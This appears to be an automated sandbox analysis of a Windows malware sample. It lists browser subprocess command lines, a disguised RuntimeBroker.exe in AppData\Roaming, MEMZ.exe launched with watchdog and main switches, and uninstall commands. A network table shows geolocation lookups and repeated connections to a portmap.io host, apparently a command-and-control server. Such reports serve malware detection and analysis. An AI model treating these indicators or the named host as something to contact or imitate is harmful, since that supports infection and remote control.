"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4268 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4408 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4556 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4688 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4540 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4752 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4432 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3272 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3224 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3500 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2084 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2364 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3516 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3516 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2100 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2064 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2692 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2684 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5356 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1644 --field-trial-handle=1884,i,13071793552152944592,910346315089759456,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1968 --field-trial-handle=1884,i,13071793552152944592,910346315089759456,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=1484 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3380 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4168 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5152 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5204 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3040 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4740 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5344 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5236 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5544 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5756 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4168 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5040 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5636 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog
C:\Users\Admin\Downloads\MEMZ.exe
"C:\Users\Admin\Downloads\MEMZ.exe" /main
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" \note.txt
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\SYSTEM32\MsiExec.exe
MsiExec.exe /X{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 77CD4EEA0315166438CDB2DBA3B1B727
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\SYSTEM32\MsiExec.exe
MsiExec.exe /X{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sebeee-39917.portmap.io | udp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| DE | 193.161.193.99:39917 | sebeee-39917.portmap.io | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.15.31.184.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 52.111.227.11:443 | tcp | |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | www.easeus.com | udp |
| US | 104.18.7.90:443 | www.easeus.com | tcp |
| US | 104.18.7.90:443 | www.easeus.com | tcp |
| US | 8.8.8.8:53 | 90.7.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.204.74:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | scripts.prdredir.com | udp |
| US | 8.8.8.8:53 | widget.trustpilot.com | udp |
| GB | 89.187.167.4:443 | cdn.consentmanager.net | tcp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | dynamic.criteo.com | udp |
| US | 8.8.8.8:53 | cdn.livechatinc.com | udp |
| US | 104.18.31.27:443 | scripts.prdredir.com | tcp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| US | 204.79.197.237:443 | bat.bing.com | tcp |
| NL | 23.62.61.88:443 | cdn.livechatinc.com | tcp |
| GB | 54.192.137.49:443 | widget.trustpilot.com | tcp |
